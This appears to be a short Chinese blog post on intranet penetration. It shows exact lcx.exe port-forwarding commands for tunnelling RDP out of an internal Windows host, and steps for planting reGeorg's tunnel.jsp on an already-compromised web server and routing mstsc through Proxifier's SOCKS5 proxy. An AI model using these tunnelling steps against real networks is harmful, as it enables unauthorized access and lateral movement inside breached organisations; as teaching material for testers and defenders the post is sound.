遇到内网windows机器,如果想远程登陆,通常得通过代理,常用的nc、lcx 工具可满足要求。

如 lcx 示例:

  • 两台机器上均上传lcx.exe
  • 在 xp机器(公网)上执行 lcx.exe -listen 51 33891
  • 在 03机器(内网)上执行 lcx.exe -slave 192.168.100.16 51 192.168.32.137 3389
  • 在 xp机器(公网)上 mstsc 127.0.0.1:33891 连接

    这里讲下 reGeorg 的多种搭配使用。

reGeorg+proxifier

测试前提是目标服务器已经getshell。
1.将 reGeorgSocksProxy 中的 tunnel.jsp 文件放置到目标服务器web目录,查看能否正常访问(如图)。
内网渗透_win_socks代理_reGeorg+proxifier-LMLPHP

2.配置好后通过 reGeory 来打通本地和目标的通道(如图显示成功连接)
内网渗透_win_socks代理_reGeorg+proxifier-LMLPHP

3.配置proxifier
打开proxifier,选择Profile -> Proxy Server -> add
内网渗透_win_socks代理_reGeorg+proxifier-LMLPHP

选择Profile -> Proxification Rules
内网渗透_win_socks代理_reGeorg+proxifier-LMLPHP

配置好之后,点击屏幕左下角的开始菜单,输入mstsc,会出现mstsc,右键它,并选择Proxifier ->Proxy Socks5 127.0.0.1,然后登陆目标内网ip。
内网渗透_win_socks代理_reGeorg+proxifier-LMLPHP
内网渗透_win_socks代理_reGeorg+proxifier-LMLPHP

05-11 22:22